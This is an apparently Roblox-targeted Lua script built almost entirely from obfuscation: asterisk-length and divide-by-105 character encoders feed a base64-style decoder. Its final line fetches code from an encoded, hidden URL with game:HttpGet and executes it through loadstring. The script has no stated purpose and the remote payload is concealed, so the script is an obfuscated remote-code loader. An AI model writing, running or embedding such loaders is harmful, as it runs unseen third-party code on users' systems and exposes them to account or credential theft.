function QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


local b=QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({'*****************************************************************','******************************************************************','*******************************************************************','********************************************************************','*********************************************************************','**********************************************************************','***********************************************************************','************************************************************************','*************************************************************************','**************************************************************************','***************************************************************************','****************************************************************************','*****************************************************************************','******************************************************************************','*******************************************************************************','********************************************************************************','*********************************************************************************','**********************************************************************************','***********************************************************************************','************************************************************************************','*************************************************************************************','**************************************************************************************','***************************************************************************************','****************************************************************************************','*****************************************************************************************','******************************************************************************************','*************************************************************************************************','**************************************************************************************************','***************************************************************************************************','****************************************************************************************************','*****************************************************************************************************','******************************************************************************************************','*******************************************************************************************************','********************************************************************************************************','*********************************************************************************************************','**********************************************************************************************************','***********************************************************************************************************','************************************************************************************************************','*************************************************************************************************************','**************************************************************************************************************','***************************************************************************************************************','****************************************************************************************************************','*****************************************************************************************************************','******************************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************************','**********************************************************************************************************************','***********************************************************************************************************************','************************************************************************************************************************','*************************************************************************************************************************','**************************************************************************************************************************','************************************************','*************************************************','**************************************************','***************************************************','****************************************************','*****************************************************','******************************************************','*******************************************************','********************************************************','*********************************************************','*******************************************','***********************************************'})
function WWgzeuqjPIcVKPYIfBIfbtxIrjjQrkDVDQTdYJnvFKOZN(data) m=string.sub(data, 0, 55) data=data:gsub(m,QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({}))

data = string.gsub(data, QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({'*******************************************************************************************','**********************************************************************************************'})..b..QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({'*************************************************************','*********************************************************************************************'}), QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({})) return (data:gsub(QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({'**********************************************'}), function(x) if (x == QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({'*************************************************************'})) then return QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({}) end local r,f=QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({}),(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({'*************************************************'}) or QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({'************************************************'})) end return r; end):gsub(QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({'*************************************','****************************************************************************************************','*************************************','****************************************************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************'}), function(x) if (#x ~= 8) then return QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({}) end local c=0 for i=1,8 do c=c+(x:sub(i,i)==QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({'*************************************************'}) and 2^(8-i) or 0) end return string.char(c) end)) end


 


function ihgiwrytViYDwtwKRYDKadyKrZj(code)res=WWgzeuqjPIcVKPYIfBIfbtxIrjjQrkDVDQTdYJnvFKOZN(QVCoZAkfFRkUsJPbyfKYcjHGqJlkbVQdHDeBGsovhaaCEutWfFnxHENzilXj({'*********************************************************************','**********************************************************************************************************','**************************************************************************','***********************************************************************************************************','*********************************************************************************','**********************************************************************************************************************','****************************************************************************','***************************************************************************','**********************************************************************************','***********************************************************************************************************','**************************************************************************************************************','**************************************************************************************************','******************************************************************************************************','*****************************************************************************************************','**************************************************************************************','******************************************************************','**********************************************************************************************************************','********************************************************************************','*****************************************************************************************','*******************************************************************************************************************','**************************************************************************************************************************','**************************************************************************************************************************','********************************************************************************','******************************************************************************','********************************************************************','***********************************************************************************************************','********************************************************************************','************************************************************************************','*******************************************************************************************************','***********************************************************************************','*********************************************************************************','*******************************************************************************************************************','*************************************************************************************************************************','******************************************************************************************************','*********************************************************************','************************************************************************************************************************','******************************************************************************************************','********************************************************************************************************************','*******************************************************************************************************','**********************************************************************************************************','*********************************************************************************************************************','**********************************************************************************************************************','*********************************************************************','***********************************************************************************','**********************************************************************************************************','*********************************************************************************','************************************************************************','*******************************************************************************','***************************************************************************************************','**************************************************************************************','*******************************************************************************','************************************************************************************************************************','**************************************************************************************************','************************************************************************','****************************************************************************'}))for i in ipairs(code)do res=res..string.char(code[i]/105)end return res end 


local b=ihgiwrytViYDwtwKRYDKadyKrZj({6825,6930,7035,7140,7245,7350,7455,7560,7665,7770,7875,7980,8085,8190,8295,8400,8505,8610,8715,8820,8925,9030,9135,9240,9345,9450,10185,10290,10395,10500,10605,10710,10815,10920,11025,11130,11235,11340,11445,11550,11655,11760,11865,11970,12075,12180,12285,12390,12495,12600,12705,12810,5040,5145,5250,5355,5460,5565,5670,5775,5880,5985,4515,4935})
function YSBJQJDnjuhCbWmFgFzuNPA(data) m=string.sub(data, 0, 55) data=data:gsub(m,ihgiwrytViYDwtwKRYDKadyKrZj({}))

data = string.gsub(data, ihgiwrytViYDwtwKRYDKadyKrZj({9555,9870})..b..ihgiwrytViYDwtwKRYDKadyKrZj({6405,9765}), ihgiwrytViYDwtwKRYDKadyKrZj({})) return (data:gsub(ihgiwrytViYDwtwKRYDKadyKrZj({4830}), function(x) if (x == ihgiwrytViYDwtwKRYDKadyKrZj({6405})) then return ihgiwrytViYDwtwKRYDKadyKrZj({}) end local r,f=ihgiwrytViYDwtwKRYDKadyKrZj({}),(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and ihgiwrytViYDwtwKRYDKadyKrZj({5145}) or ihgiwrytViYDwtwKRYDKadyKrZj({5040})) end return r; end):gsub(ihgiwrytViYDwtwKRYDKadyKrZj({3885,10500,3885,10500,3885,10500,6615,3885,10500,6615,3885,10500,6615,3885,10500,6615,3885,10500,6615,3885,10500,6615}), function(x) if (#x ~= 8) then return ihgiwrytViYDwtwKRYDKadyKrZj({}) end local c=0 for i=1,8 do c=c+(x:sub(i,i)==ihgiwrytViYDwtwKRYDKadyKrZj({5145}) and 2^(8-i) or 0) end return string.char(c) end)) end


 


loadstring(game:HttpGet(YSBJQJDnjuhCbWmFgFzuNPA(ihgiwrytViYDwtwKRYDKadyKrZj({11445,12705,10710,7770,11655,12600,12285,9345,12495,12285,10290,10815,6825,8925,11340,8505,10185,8820,12495,9450,6930,7770,11865,8505,11865,10290,9240,12075,7035,11865,11970,8505,7560,8610,7350,9135,7245,8190,7140,12285,8400,7980,8400,8610,10920,8610,11235,12075,12075,11445,10605,9240,11130,10815,10815,10185,7560,8610,5040,10395,7560,8085,5670,7980,12705,5985,11655,10500,9135,10500,11340,9450,5250,7350,12180,9450,9240,8085,12285,10395,5355,6930,10920,9345,5250,8925,12390,8190,11130,6825,12810,9345,11130,10395,12495,9450,11445,8085,12705,8295,8820,8925,12810,8190,12810,7245,12600,9345,12810,8925,12705,9345,5250,7350,11025,8190,9135,9450,11235,7980,11445,12600,5145,9345,8505,6405,6405}))))()
